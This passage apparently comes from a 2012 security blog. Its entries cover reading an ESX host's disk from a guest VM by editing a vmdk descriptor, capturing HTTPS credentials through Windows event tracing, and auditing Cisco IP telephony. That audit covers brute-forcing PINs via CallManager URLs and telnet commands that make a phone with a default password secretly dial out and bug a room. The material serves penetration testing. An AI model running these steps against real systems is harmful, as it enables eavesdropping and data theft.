      • Extract files in the gzip package: tar -x -i --ignore-command-error --ignore-failed-read -z -f local.tgz [screenshot of above steps]
      • Examine the content of the extracted data. Get the device file name from etc/vmware/esx.conf (naa...) [screenshot]
      Good! we can get host volume details from a guest!

      Step 2: Simulate the stealing of a host's volume content from a Debian guest
      • In the host's console session, change the vmdk descriptor file as follows (added line in blue), taking into consideration the volume details obtained before:
      /vmfs/volumes/4e5bfad0-283f8ee6-1b9d-b499ba04496a/Small and temporary VM for Eric # vi Small\ and\ temporary\ VM\ for\ Eric.vmdk
      # Disk DescriptorFile
      version=1
      encoding="UTF-8"
      CID=f7fc44b3
      parentCID=ffffffff
      isNativeSnapshot="no"
      createType="vmfs"

      # Extent description
      RW 2097152 VMFS "Small and temporary VM for Eric-flat.vmdk"
      RW 8386560 VMFSRAW "/dev/disks/naa.600508b1001c1bd269ddc2f549010bad:2"
      [...]
      • Restart the VM and reestablish a shell session to it
      • View the data of the volume [screenshot]

      NB: Although the above steps were successful to demonstrate how a guest could abuse access to data on the host, I could not reproduce the same thing by creating a portable OVF format that could be deployed to the host from a remote vSphere client (simulating a malicious IaaS customer).

      However, my testing wasn't exhaustive. I didn't try to craft an OVF package taking into consideration the above. Somehow, I can't imagine that the deployment of such as package (with an absolute path pointing to a known host file/device) would work. Perhaps I should have thought of that before I started all this testing!

      Nevertheless, it's not completely impossible that a cloud provider would use a different portable format that would allow this attack vector to work.

      19 Oct 2012

      Web credential stealing (even HTTPS) via Windows event traces

      Mark Bagget a trouvé une méthode pour extraire les détails de session web (même celles utilisant SSL) en activant le tracage Event Tracing for Windows (EVT), incluant le nom d'usager et mot de passe. Les détails sur le wiki de PaulDotCom. Cette méthode a certains prérequis (WinInet API).
      Mark Bagget was able to extract web session details (including user credentials using SSL) by turning on some event tracing on a Windows target (i.e. post exploitation tool). This is described on the PaulDotCom show notes at
      Episode300 - PaulDotCom Security Weekly. NB: this method has prerequisites (WinInet API usage).

      16 Oct 2012

      Montreal Java User Group

      Le Montréal Java User Group (JUG) est un groupe d'utilisateurs Java se réunissant régulièrement afin d'échanger des idées et de discuter des avancées technologiques de la plateforme Java.

      14 Oct 2012

      Cisco IP Telephony security auditing ideas

      Here's some ideas for security auditing a Cisco IP Telephony solution.

      Password Auditing

      Web UI

      Use Burp to send POST requests (for all users) to the Cisco Call Manager login form at https://.../ccmuser/showHome.do

      IP phone PIN 

      The programmatic approach to test for Phone PIN would use an approach as described here: http://blog.malerisch.net/2012/10/callmanager-pin-bruteforce.html

      NB: I haven't done that test automatically to avoid problems (in Prod) but I think that the clean sequence required looks like this:
      • Get SIDVAL: /ccmpd/pdCheckLogin.do?name=undefined 
      • Try logging in -- if we get XML w/o error, we're good; set pin value to your Org's default: /ccmpd/login.do?sid=SIDVAL&userid=USERID&pin=PIN
      • Initiate logout: /ccmpd/pdLogoutPage.do?sid=SIDVAL
      • Confirm logout and close session: /ccmpd/logout.do?sid=SIDVAL

       

      Test other URIs used by Cisco IP phone

      • http://.../ccmcip/xmldirectory.jsp 
      • http://.../ccmcip/getservicesmenu.jsp 
      • http://.../ccmcip/GetTelecasterHelpText.jsp 
      • http://.../ccmcip/authenticate.jsp

      Check if IP Phones can be used to remotely bug a (conference) room 

      Another test idea is to see if listening in on remote conversations is possible because of unchanged defaults. This is described here http://dorkbyte.com/2010/10/31/cisco-ip-phones-lets-you-remotely-bug-a-room/

      Excerpt from above reference (in case the above post disappears):
      There exists an interesting “feature” in Cisco IP phones that allows a crafty user to remotely control a Cisco IP phone and set it to call a remote number (if setup to do so) and allow audio to stream normally — in effect allowing someone to remotely audio bug a room. In all fairness, this feature requires the controlling user to know the configured password for the phone which many installations leave the default password of “cisco” set.

      To try this out:
      1. Telnet to the phone (e.g. “telnet 192.0.2.10″). You may need to bridge your PC to the IP Phone VLAN from within the office (see http://www.linuxjournal.com/article/10821?page=0,2, use VLAN as determined from an IP phone's settings - eg: VLAN 161, IP: 172.16.2.241/255.255.255.127, DHCP server: 172.16.29.10, Host Name: SEPD0C282439930)
      2. Enter the password for the phone At the “SIP Phone>” prompt: Start a “test” session with “test open”
      3. Virtually take the phone off the hook with “test offhook”
      4. Virtually dial the telephone number where the audio stream should go with “test key ” (e.g. “test key 14155556666″) 
      5. The phone will start to make the call… Switch to speakerphone with “test key spkr” (to virtually push the Speakerphone key) 
      6. Listen to the audio streaming from the phone…